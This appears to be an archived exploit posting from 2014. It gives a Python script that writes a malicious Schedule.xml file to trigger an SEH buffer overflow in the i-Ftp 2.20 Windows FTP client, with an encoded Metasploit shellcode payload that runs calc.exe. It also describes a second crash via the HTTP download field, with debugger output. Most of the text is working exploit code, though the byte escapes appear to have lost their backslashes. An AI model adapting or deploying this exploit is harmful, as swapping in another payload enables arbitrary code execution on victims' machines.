Home / exploits i-Ftp 2.20 Buffer Overflow
Posted on 07 November 2014
#!/usr/bin/python #Exploit Title:i-FTP Buffer Overflow SEH #Homepage:http://www.memecode.com/iftp.php #Software Link:www.memecode.com/data/iftp-win32-v220.exe #Version:i.Ftp v2.20 (Win32 Release) #Vulnerability discovered:26.10.2014 #Description:Simple portable cross platform FTP/SFTP/HTTP client. #Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN #Exploit Author:metacom --> twitter.com/m3tac0m import struct def little_endian(address): return struct.pack("<L",address) poc ="x41" * 591 poc+="xebx06x90x90" poc+=little_endian(0x1004C31F)#1004C31F 5E POP ESI poc+="x90" * 80 # msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R #| msfencode -e x86/alpha_upper -b "x00x0ax0dx20x22" -t c poc+=("x89xe7xdaxcexd9x77xf4x58x50x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx4bx58x4dx59x35x50" "x53x30x55x50x43x50x4dx59x4dx35x46x51x39x42x55" "x34x4cx4bx51x42x30x30x4cx4bx51x42x44x4cx4cx4b" "x51x42x32x34x4cx4bx54x32x31x38x44x4fx58x37x30" "x4ax57x56x50x31x4bx4fx36x51x4fx30x4ex4cx57x4c" "x33x51x43x4cx44x42x46x4cx31x30x4fx31x58x4fx44" "x4dx45x51x38x47x5ax42x5ax50x31x42x46x37x4cx4b" "x46x32x42x30x4cx4bx30x42x47x4cx55x51x48x50x4c" "x4bx51x50x44x38x4bx35x39x50x44x34x30x4ax53x31" "x48x50x46x30x4cx4bx51x58x35x48x4cx4bx51x48x57" "x50x45x51x58x53x4bx53x47x4cx47x39x4cx4bx37x44" "x4cx4bx53x31x58x56x50x31x4bx4fx36x51x4fx30x4e" "x4cx59x51x58x4fx54x4dx43x31x39x57x56x58x4bx50" "x33x45x4bx44x43x33x43x4dx5ax58x47x4bx53x4dx31" "x34x52x55x4ax42x50x58x4cx4bx50x58x57x54x43x31" "x49x43x55x36x4cx4bx44x4cx30x4bx4cx4bx30x58x45" "x4cx55x51x58x53x4cx4bx34x44x4cx4bx43x31x38x50" "x4cx49x30x44x31x34x57x54x51x4bx31x4bx53x51x30" "x59x51x4ax36x31x4bx4fx4bx50x36x38x51x4fx51x4a" "x4cx4bx55x42x4ax4bx4dx56x51x4dx42x4ax53x31x4c" "x4dx4bx35x58x39x33x30x35x50x33x30x56x30x33x58" "x30x31x4cx4bx42x4fx4dx57x4bx4fx39x45x4fx4bx4b" "x4ex44x4ex56x52x5ax4ax53x58x39x36x4dx45x4fx4d" "x4dx4dx4bx4fx38x55x47x4cx34x46x33x4cx54x4ax4b" "x30x4bx4bx4bx50x53x45x45x55x4fx4bx50x47x52x33" "x42x52x42x4fx42x4ax55x50x31x43x4bx4fx4ex35x53" "x53x55x31x32x4cx45x33x46x4ex52x45x44x38x52x45" "x55x50x41x41") poc+="x90" * (20000 - len(poc)) header = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22" header += "x55x54x46x2dx38x22x20x3fx3ex0ax3cx53x63x68x65x64x75x6cx65x3ex0ax09x3cx45x76x65x6ex74x20x55" header += "x72x6cx3dx22x22x20x54x69x6dx65x3dx22x68x74x74x70x3ax2fx2fx0a" + poc footer = "x22x20x46x6fx6cx64x65x72x3dx22x22x20x2fx3ex0ax3cx2fx53x63x68x65x64x75x6cx65x3ex0a" exploit = header + footer filename = "Schedule.xml" file = open(filename , "w") file.write(exploit) print " [*]Vulnerable Created Schedule.xml!" print "[*]Copy Schedule.xml to C:Program FilesMemecodei.Ftp" print "[*]Start IFTP" print "[*]----------------------------------------------------" file.close() print ''' [+]Second Vulnerability [-]You can also enter the contents 20000 A of the file in the --> * HTTP -> HTTP Download --> Option "FILE" to cause this crash * Access violation - code c0000005 (!!! second chance !!!) * 0:003> !exchain * 016fff2c: 41414141 * Invalid exception stack at 41414141'''
